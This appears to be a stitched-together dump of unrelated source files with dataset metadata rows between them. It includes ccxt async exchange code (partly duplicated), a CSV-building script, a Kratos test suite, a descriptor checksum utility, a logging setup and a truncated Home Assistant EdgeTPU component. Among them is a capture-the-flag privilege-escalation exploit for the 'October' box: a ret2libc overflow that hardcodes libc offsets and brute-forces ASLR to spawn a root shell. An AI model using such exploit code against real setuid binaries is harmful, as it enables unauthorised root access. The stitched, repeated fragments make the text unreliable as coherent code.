if self.markets:
if not self.markets_by_id:
return self.set_markets(self.markets)
return self.markets
markets = await self.fetch_markets()
currencies = None
if self.has['fetchCurrencies']:
currencies = await self.fetch_currencies()
return self.set_markets(markets, currencies)
async def fetch_markets(self):
return self.markets
async def fetch_order_status(self, id, market=None):
order = await self.fetch_order(id)
return order['status']
async def fetch_partial_balance(self, part, params={}):
balance = await self.fetch_balance(params)
return balance[part]
async def fetch_l2_order_book(self, symbol, limit=None, params={}):
orderbook = await self.fetch_order_book(symbol, limit, params)
return self.extend(orderbook, {
'bids': self.sort_by(self.aggregate(orderbook['bids']), 0, True),
'asks': self.sort_by(self.aggregate(orderbook['asks']), 0),
})
async def perform_order_book_request(self, market, limit=None, params={}):
raise NotSupported(self.id + ' performOrderBookRequest not supported yet')
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
orderbook = await self.perform_order_book_request(market, limit, params)
return self.parse_order_book(orderbook, market, limit, params)
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if not self.has['fetchTrades']:
self.raise_error(NotSupported, details='fetch_ohlcv() not implemented yet')
await self.load_markets()
trades = await self.fetch_trades(symbol, since, limit, params)
return self.build_ohlcv(trades, timeframe, since, limit)
async def fetch_full_tickers(self, symbols=None, params={}):
tickers = await self.fetch_tickers(symbols, params)
return tickers
async def edit_order(self, id, symbol, *args):
if not self.enableRateLimit:
self.raise_error(ExchangeError, details='updateOrder() requires enableRateLimit = true')
await self.cancel_order(id, symbol)
return await self.create_order(symbol, *args)
| 41.082927 | 135 | 0.602114 |
__version__ = '1.13.45'
import asyncio
import concurrent
import socket
import time
import math
import random
import certifi
import aiohttp
import ssl
import yarl
from ccxt.async.base.throttle import throttle
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import RequestTimeout
from ccxt.base.errors import NotSupported
from ccxt.base.exchange import Exchange as BaseExchange
__all__ = [
'BaseExchange',
'Exchange',
]
class Exchange(BaseExchange):
def __init__(self, config={}):
if 'asyncio_loop' in config:
self.asyncio_loop = config['asyncio_loop']
self.asyncio_loop = self.asyncio_loop or asyncio.get_event_loop()
self.own_session = 'session' not in config
if self.own_session:
context = ssl.create_default_context(cafile=certifi.where())
connector = aiohttp.TCPConnector(ssl_context=context, loop=self.asyncio_loop)
self.session = aiohttp.ClientSession(loop=self.asyncio_loop, connector=connector)
super(Exchange, self).__init__(config)
self.init_rest_rate_limiter()
def init_rest_rate_limiter(self):
self.throttle = throttle(self.extend({
'loop': self.asyncio_loop,
}, self.tokenBucket))
def __del__(self):
if self.session is not None:
self.logger.warning(self.id + ' requires to release all resources with an explicit call to the .close() coroutine.')
async def close(self):
if self.session is not None:
if self.own_session:
await self.session.close()
self.session = None
async def wait_for_token(self):
while self.rateLimitTokens <= 1:
self.add_new_tokens()
seconds_delays = [0.001, 0.005, 0.022, 0.106, 0.5]
delay = random.choice(seconds_delays)
await asyncio.sleep(delay)
self.rateLimitTokens -= 1
def add_new_tokens(self):
now = time.monotonic()
time_since_update = now - self.rateLimitUpdateTime
new_tokens = math.floor((0.8 * 1000.0 * time_since_update) / self.rateLimit)
if new_tokens > 1:
self.rateLimitTokens = min(self.rateLimitTokens + new_tokens, self.rateLimitMaxTokens)
self.rateLimitUpdateTime = now
async def fetch2(self, path, api='public', method='GET', params={}, headers=None, body=None):
"""A better wrapper over request for deferred signing"""
if self.enableRateLimit:
await self.throttle()
self.lastRestRequestTimestamp = self.milliseconds()
request = self.sign(path, api, method, params, headers, body)
return await self.fetch(request['url'], request['method'], request['headers'], request['body'])
async def fetch(self, url, method='GET', headers=None, body=None):
"""Perform a HTTP request and return decoded JSON data"""
headers = self.prepare_request_headers(headers)
url = self.proxy + url
if self.verbose:
print("\nRequest:", method, url, headers, body)
self.logger.debug("%s %s, Request: %s %s", method, url, headers, body)
encoded_body = body.encode() if body else None
session_method = getattr(self.session, method.lower())
http_status_code = None
try:
async with session_method(yarl.URL(url, encoded=True),
data=encoded_body,
headers=headers,
timeout=(self.timeout / 1000),
proxy=self.aiohttp_proxy) as response:
http_status_code = response.status
text = await response.text()
self.last_http_response = text
self.last_response_headers = response.headers
self.handle_errors(http_status_code, text, url, method, self.last_response_headers, text)
self.handle_rest_errors(None, http_status_code, text, url, method)
if self.verbose:
print("\nResponse:", method, url, str(http_status_code), str(response.headers), self.last_http_response)
self.logger.debug("%s %s, Response: %s %s %s", method, url, response.status, response.headers, self.last_http_response)
except socket.gaierror as e:
self.raise_error(ExchangeNotAvailable, url, method, e, None)
except concurrent.futures._base.TimeoutError as e:
self.raise_error(RequestTimeout, method, url, e, None)
except aiohttp.client_exceptions.ClientConnectionError as e:
self.raise_error(ExchangeNotAvailable, url, method, e, None)
except aiohttp.client_exceptions.ClientError as e:
self.raise_error(ExchangeError, url, method, e, None)
self.handle_errors(http_status_code, text, url, method, self.last_response_headers, text)
return self.handle_rest_response(text, url, method, headers, body)
async def load_markets(self, reload=False):
if not reload:
if self.markets:
if not self.markets_by_id:
return self.set_markets(self.markets)
return self.markets
markets = await self.fetch_markets()
currencies = None
if self.has['fetchCurrencies']:
currencies = await self.fetch_currencies()
return self.set_markets(markets, currencies)
async def fetch_markets(self):
return self.markets
async def fetch_order_status(self, id, market=None):
order = await self.fetch_order(id)
return order['status']
async def fetch_partial_balance(self, part, params={}):
balance = await self.fetch_balance(params)
return balance[part]
async def fetch_l2_order_book(self, symbol, limit=None, params={}):
orderbook = await self.fetch_order_book(symbol, limit, params)
return self.extend(orderbook, {
'bids': self.sort_by(self.aggregate(orderbook['bids']), 0, True),
'asks': self.sort_by(self.aggregate(orderbook['asks']), 0),
})
async def perform_order_book_request(self, market, limit=None, params={}):
raise NotSupported(self.id + ' performOrderBookRequest not supported yet')
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
orderbook = await self.perform_order_book_request(market, limit, params)
return self.parse_order_book(orderbook, market, limit, params)
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if not self.has['fetchTrades']:
self.raise_error(NotSupported, details='fetch_ohlcv() not implemented yet')
await self.load_markets()
trades = await self.fetch_trades(symbol, since, limit, params)
return self.build_ohlcv(trades, timeframe, since, limit)
async def fetch_full_tickers(self, symbols=None, params={}):
tickers = await self.fetch_tickers(symbols, params)
return tickers
async def edit_order(self, id, symbol, *args):
if not self.enableRateLimit:
self.raise_error(ExchangeError, details='updateOrder() requires enableRateLimit = true')
await self.cancel_order(id, symbol)
return await self.create_order(symbol, *args)
| false | true |
f72ebdd68a8fe652c399e7e2317e2c40df3f83a1 | 840 | py | Python | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | import urllib.request
from bs4 import BeautifulSoup
from time import sleep
import json
import hashlib
import os
from PIL import Image
import glob
files = glob.glob("tmp/*.json")
rows = []
rows.append(["ID", "Original", "Thubmnail", "Width", "Height"])
for file in sorted(files):
filename = file.split("/")[-1]
tmp = filename.replace(".json", "").split("_")
page = int(tmp[1])
if page >= 1:
print(filename)
# jsonファイルを読み込む
f = open(file)
# jsonデータを読み込んだファイルオブジェクトからPythonデータを作成
data = json.load(f)
# ファイルを閉じる
f.close()
rows.append([tmp[0], data["original"], data["thumbnail"], data["width"], data["height"]])
import csv
f = open('data/media.csv', 'w')
writer = csv.writer(f, lineterminator='\n')
writer.writerows(rows)
f.close()
| 17.87234 | 97 | 0.608333 | import urllib.request
from bs4 import BeautifulSoup
from time import sleep
import json
import hashlib
import os
from PIL import Image
import glob
files = glob.glob("tmp/*.json")
rows = []
rows.append(["ID", "Original", "Thubmnail", "Width", "Height"])
for file in sorted(files):
filename = file.split("/")[-1]
tmp = filename.replace(".json", "").split("_")
page = int(tmp[1])
if page >= 1:
print(filename)
f = open(file)
data = json.load(f)
f.close()
rows.append([tmp[0], data["original"], data["thumbnail"], data["width"], data["height"]])
import csv
f = open('data/media.csv', 'w')
writer = csv.writer(f, lineterminator='\n')
writer.writerows(rows)
f.close()
| true | true |
f72ebe8dc117d55ab1f3ff02c98054a97ce7d90a | 5,820 | py | Python | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 778 | 2017-01-27T16:29:17.000Z | 2022-03-30T03:01:51.000Z | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 6,634 | 2017-01-15T22:56:13.000Z | 2022-03-31T15:03:36.000Z | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 224 | 2017-02-07T14:12:49.000Z | 2022-03-06T23:09:34.000Z | # import Kratos
from KratosMultiphysics import *
from KratosMultiphysics.IgaApplication import *
import run_cpp_unit_tests
import KratosMultiphysics.kratos_utilities as kratos_utilities
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import Iga test factory tests
from iga_test_factory import SinglePatchTest as SinglePatchTest
# Truss tests - python based
from truss_element_tests import TrussElementTests as TTrussElementTests
# Membrane tests
from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic
# 3p Shell KL - python based
from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests
# 3p Shell KL
from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest
from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest
# 5p Shell Hierarchic
from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest
from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest
from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest
# 5p Shell
from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest
# Weak support tests
from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest
from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest
from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest
# Coupling/C_0 tests
from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest
from iga_test_factory import TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest
from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest
from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest
# Rotation/G_1 coupling tests
from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest
from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest
# Nurbs Volume tests
from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements
# Modelers tests
from test_modelers import TestModelers as TTestModelers
has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication")
def AssembleTestSuites():
''' Populates the test suites to run.
Populates the test suites to run. At least, it should pupulate the suites:
"small", "nighlty" and "all"
Return
------
suites: A dictionary of suites
The set of suites with its test_cases added.
'''
suites = KratosUnittest.KratosSuites
smallSuite = suites['small']
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
# Single patch test - checks iga essentials
SinglePatchTest,
# Truss tests
TTrussElementTests,
# Membrane tests
MembraneSinglePatchFourPointSailLinearStatic,
MembraneSinglePatchFourPointSailNonLinearStatic,
# 3p Shell KL
TShell3pElementTests,
ScordelisRoofShell3pTest,
LinearBeamShell3pTest,
# 5p Shell Director
ScordelisRoofShell5pTest,
# Weak support tests
SinglePatchRefinedSupportPenaltyTest,
SinglePatchRefinedSupportLagrangeTest,
# Coupling tests
TwoPatchCouplingPenaltyShell3pTest,
TwoPatchCouplingLagrangeShell3pTest,
TwoPatchRefinedCouplingPenaltyMembraneTest,
TwoPatchRefinedCouplingLagrangeMembraneTest,
# Rotation/G_1 coupling tests
TwoPatchCantileverCouplingPenaltyTest,
TwoPatchCantileverRefinedCouplingPenaltyTest,
# Volumes
TTestNurbsVolumeElements,
# Modelers
TTestModelers
]))
if has_linear_solvers_application:
from KratosMultiphysics import LinearSolversApplication
if LinearSolversApplication.HasFEAST():
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
# Weak support Nitsche test
SinglePatchRefinedSupportNitscheTest,
# Coupling Nitsche tests
TwoPatchCouplingNitscheShell3pTest,
TwoPatchRefinedCouplingNitscheMembraneTest
]))
else:
print("FEAST not available in LinearSolversApplication")
nightSuite = suites['nightly']
nightSuite.addTests(smallSuite)
nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
# Membrane tests
MembraneSinglePatchFourPointSailImplicitDynamic,
# 5p Shell Hierarchic
TShell5pHierarchicLinearThickBeamTest,
TShell5pHierarchicLinearScordelisTest,
TShell5pHierarchicNonLinearThickBeamTest
]))
allSuite = suites['all']
allSuite.addTests(nightSuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
| 46.56 | 127 | 0.813746 |
from KratosMultiphysics import *
from KratosMultiphysics.IgaApplication import *
import run_cpp_unit_tests
import KratosMultiphysics.kratos_utilities as kratos_utilities
import KratosMultiphysics.KratosUnittest as KratosUnittest
from iga_test_factory import SinglePatchTest as SinglePatchTest
from truss_element_tests import TrussElementTests as TTrussElementTests
from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic
from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests
from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest
from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest
from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest
from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest
from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest
from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest
from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest
from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest
from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest
from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest
from iga_test_factory import TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest
from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest
from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest
from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest
from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest
from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements
from test_modelers import TestModelers as TTestModelers
has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication")
def AssembleTestSuites():
suites = KratosUnittest.KratosSuites
smallSuite = suites['small']
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
SinglePatchTest,
TTrussElementTests,
MembraneSinglePatchFourPointSailLinearStatic,
MembraneSinglePatchFourPointSailNonLinearStatic,
TShell3pElementTests,
ScordelisRoofShell3pTest,
LinearBeamShell3pTest,
ScordelisRoofShell5pTest,
SinglePatchRefinedSupportPenaltyTest,
SinglePatchRefinedSupportLagrangeTest,
TwoPatchCouplingPenaltyShell3pTest,
TwoPatchCouplingLagrangeShell3pTest,
TwoPatchRefinedCouplingPenaltyMembraneTest,
TwoPatchRefinedCouplingLagrangeMembraneTest,
TwoPatchCantileverCouplingPenaltyTest,
TwoPatchCantileverRefinedCouplingPenaltyTest,
TTestNurbsVolumeElements,
TTestModelers
]))
if has_linear_solvers_application:
from KratosMultiphysics import LinearSolversApplication
if LinearSolversApplication.HasFEAST():
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
SinglePatchRefinedSupportNitscheTest,
TwoPatchCouplingNitscheShell3pTest,
TwoPatchRefinedCouplingNitscheMembraneTest
]))
else:
print("FEAST not available in LinearSolversApplication")
nightSuite = suites['nightly']
nightSuite.addTests(smallSuite)
nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
MembraneSinglePatchFourPointSailImplicitDynamic,
TShell5pHierarchicLinearThickBeamTest,
TShell5pHierarchicLinearScordelisTest,
TShell5pHierarchicNonLinearThickBeamTest
]))
allSuite = suites['all']
allSuite.addTests(nightSuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
| true | true |
f72ebf2c577dad9380f79aaf1c4edf5bb78e7756 | 2,106 | py | Python | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 20 | 2021-04-03T09:08:10.000Z | 2022-02-08T23:27:12.000Z | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 2 | 2021-04-03T05:41:45.000Z | 2021-09-30T09:38:36.000Z | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 3 | 2021-04-16T21:54:02.000Z | 2021-12-17T16:39:04.000Z | #!/usr/bin/env python3
# Copyright (c) 2019 Pieter Wuille
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Utility functions related to output descriptors"""
INPUT_CHARSET = "0123456789()[],'/*abcdefgh@:$%{}IJKLMNOPQRSTUVWXYZ&+-.;<=>?!^_|~ijklmnopqrstuvwxyzABCDEFGH`#\"\\ "
CHECKSUM_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0xf5dee51989, 0xa9fdca3312, 0x1bab10e32d, 0x3706b1677a, 0x644d626ffd]
def descsum_polymod(symbols):
"""Internal function that computes the descriptor checksum."""
chk = 1
for value in symbols:
top = chk >> 35
chk = (chk & 0x7ffffffff) << 5 ^ value
for i in range(5):
chk ^= GENERATOR[i] if ((top >> i) & 1) else 0
return chk
def descsum_expand(s):
"""Internal function that does the character to symbol expansion"""
groups = []
symbols = []
for c in s:
if not c in INPUT_CHARSET:
return None
v = INPUT_CHARSET.find(c)
symbols.append(v & 31)
groups.append(v >> 5)
if len(groups) == 3:
symbols.append(groups[0] * 9 + groups[1] * 3 + groups[2])
groups = []
if len(groups) == 1:
symbols.append(groups[0])
elif len(groups) == 2:
symbols.append(groups[0] * 3 + groups[1])
return symbols
def descsum_create(s):
"""Add a checksum to a descriptor without"""
symbols = descsum_expand(s) + [0, 0, 0, 0, 0, 0, 0, 0]
checksum = descsum_polymod(symbols) ^ 1
return s + '#' + ''.join(CHECKSUM_CHARSET[(checksum >> (5 * (7 - i))) & 31] for i in range(8))
def descsum_check(s, require=True):
"""Verify that the checksum is correct in a descriptor"""
if not '#' in s:
return not require
if s[-9] != '#':
return False
if not all(x in CHECKSUM_CHARSET for x in s[-8:]):
return False
symbols = descsum_expand(s[:-9]) + [CHECKSUM_CHARSET.find(x) for x in s[-8:]]
return descsum_polymod(symbols) == 1
| 37.607143 | 116 | 0.603039 |
INPUT_CHARSET = "0123456789()[],'/*abcdefgh@:$%{}IJKLMNOPQRSTUVWXYZ&+-.;<=>?!^_|~ijklmnopqrstuvwxyzABCDEFGH`#\"\\ "
CHECKSUM_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0xf5dee51989, 0xa9fdca3312, 0x1bab10e32d, 0x3706b1677a, 0x644d626ffd]
def descsum_polymod(symbols):
chk = 1
for value in symbols:
top = chk >> 35
chk = (chk & 0x7ffffffff) << 5 ^ value
for i in range(5):
chk ^= GENERATOR[i] if ((top >> i) & 1) else 0
return chk
def descsum_expand(s):
groups = []
symbols = []
for c in s:
if not c in INPUT_CHARSET:
return None
v = INPUT_CHARSET.find(c)
symbols.append(v & 31)
groups.append(v >> 5)
if len(groups) == 3:
symbols.append(groups[0] * 9 + groups[1] * 3 + groups[2])
groups = []
if len(groups) == 1:
symbols.append(groups[0])
elif len(groups) == 2:
symbols.append(groups[0] * 3 + groups[1])
return symbols
def descsum_create(s):
symbols = descsum_expand(s) + [0, 0, 0, 0, 0, 0, 0, 0]
checksum = descsum_polymod(symbols) ^ 1
return s + '#' + ''.join(CHECKSUM_CHARSET[(checksum >> (5 * (7 - i))) & 31] for i in range(8))
def descsum_check(s, require=True):
if not '#' in s:
return not require
if s[-9] != '#':
return False
if not all(x in CHECKSUM_CHARSET for x in s[-8:]):
return False
symbols = descsum_expand(s[:-9]) + [CHECKSUM_CHARSET.find(x) for x in s[-8:]]
return descsum_polymod(symbols) == 1
| true | true |
f72ebf40c45cdd85f1466235d3246a9f0f02d062 | 263 | py | Python | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | 1 | 2022-03-18T02:53:26.000Z | 2022-03-18T02:53:26.000Z | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | 1 | 2022-02-26T22:33:51.000Z | 2022-02-26T22:33:51.000Z | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | null | null | null | import logging
import sys
import os
logging.basicConfig(
level=logging.getLevelName(os.getenv("LOG_LEVEL") or "INFO"),
format="[%(asctime)s] [%(levelname)s] %(message)s",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger = logging.getLogger()
| 21.916667 | 65 | 0.707224 | import logging
import sys
import os
logging.basicConfig(
level=logging.getLevelName(os.getenv("LOG_LEVEL") or "INFO"),
format="[%(asctime)s] [%(levelname)s] %(message)s",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger = logging.getLogger()
| true | true |
f72ebf692ce4d13b38c4b06937c4b2c86a362b7e | 810 | py | Python | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | null | null | null | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | null | null | null | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | 1 | 2021-07-27T12:56:03.000Z | 2021-07-27T12:56:03.000Z | #
# Privilege Escalation Exploit for hackTheBox October
#
# From IppSec https://youtu.be/K05mJazHhF4
#
from subprocess import call
import struct
# libc base address using:
# ldd /usr/local/bin/ovrflw | grep libc
libc_base_addr = 0xb75e0000
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
system_off = 0x00040310
exit_off = 0x00033260
# strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
binsh_off = 0x00162bac
binsh_addr = struct.pack("<I", libc_base_addr + binsh_off)
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
junk = ('A' * 112)
payload = junk + system_addr + exit_addr + binsh_addr
i = 0
while (i < 512):
print("Try: %s" % i)
i += 1
ret = call(["/usr/local/bin/ovrflw", payload])
| 21.891892 | 62 | 0.691358 |
from subprocess import call
import struct
libc_base_addr = 0xb75e0000
system_off = 0x00040310
exit_off = 0x00033260
binsh_off = 0x00162bac
binsh_addr = struct.pack("<I", libc_base_addr + binsh_off)
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
junk = ('A' * 112)
payload = junk + system_addr + exit_addr + binsh_addr
i = 0
while (i < 512):
print("Try: %s" % i)
i += 1
ret = call(["/usr/local/bin/ovrflw", payload])
| true | true |
f72ec08d1ab18ada95fe41cc5b706441b9da8ce8 | 6,871 | py | Python | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | """Support for performing EdgeTPU classification on images."""
import logging
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_ENTITY_ID, CONF_NAME, CONF_SOURCE, PLATFORM_SCHEMA,
ImageProcessingEntity)
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = 'matches'
ATTR_SUMMARY = 'summary'
ATTR_TOTAL_MATCHES = 'total_matches'
CONF_CATEGORIES = 'categories'
CONF_CATEGORY = 'category'
CONF_FILE_OUT = 'file_out'
CONF_PATH = 'path'
CONF_LABELS = 'labels'
CONF_MODEL = 'model'
CONF_MODEL_DIR = 'model_dir'
CONF_TPU_DEVICE = 'device'
CONF_TPU_TOP_K = 'top_k'
CONF_TPU_THRESHOLD = 'threshold'
CONF_TPU_KEEP_ASPECT_RATIO = 'keep_aspect_ratio'
CONF_TPU_RESAMPLE = 'resample'
DEFAULT_THRESHOLD = 0.05
DEFAULT_TOP_K = 10
DEFAULT_KEEP_ASPECT_RATIO = True
DEFAULT_RESAMPLE = 0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_FILE_OUT, default=[]):
vol.All(cv.ensure_list, [cv.template]),
vol.Required(CONF_MODEL): vol.Schema({
vol.Required(CONF_PATH): cv.isfile,
vol.Optional(CONF_LABELS): cv.isfile,
vol.Optional(CONF_MODEL_DIR): cv.isdir,
vol.Optional(CONF_TPU_DEVICE): cv.string,
vol.Optional(CONF_TPU_THRESHOLD, default=DEFAULT_THRESHOLD): cv.small_float,
vol.Optional(CONF_TPU_KEEP_ASPECT_RATIO, default=DEFAULT_KEEP_ASPECT_RATIO): cv.boolean,
vol.Optional(CONF_TPU_RESAMPLE, default=DEFAULT_RESAMPLE): cv.positive_int,
vol.Optional(CONF_TPU_TOP_K, default=DEFAULT_TOP_K): cv.positive_int,
})
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the EdgeTPU image processing platform."""
try:
# Verify that the TensorFlow Object Detection API is pre-installed
# pylint: disable=unused-import,unused-variable
from edgetpu.detection.engine import DetectionEngine
except ImportError:
# pylint: disable=line-too-long
_LOGGER.error(
"No EdgeTPU Object Detection library found! Install or compile ") # noqa
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(EdgeTPUImageProcessor(
hass, camera[CONF_ENTITY_ID], camera.get(CONF_NAME),
config))
add_entities(entities)
class EdgeTPUImageProcessor(ImageProcessingEntity):
"""Representation of an EdgeTPU image processor."""
def __init__(self, hass, camera_entity, name, config):
"""Initialize the EdgeTPU entity."""
from edgetpu.detection.engine import DetectionEngine # pylint: disable=import-error
model_config = config.get(CONF_MODEL)
_LOGGER.info("config = %s", model_config)
self.hass = hass
self._camera_entity = camera_entity
_LOGGER.info("camera = %s", self._camera_entity)
if name:
self._name = name
else:
self._name = "EdgeTPU {0}".format(
split_entity_id(camera_entity)[1])
self._file_out = config.get(CONF_FILE_OUT)
self._model = model_config.get(CONF_PATH)
self._threshold = model_config.get(CONF_TPU_THRESHOLD)
self._top_k = model_config.get(CONF_TPU_TOP_K)
self._keep_aspect_ratio = model_config.get(CONF_TPU_KEEP_ASPECT_RATIO)
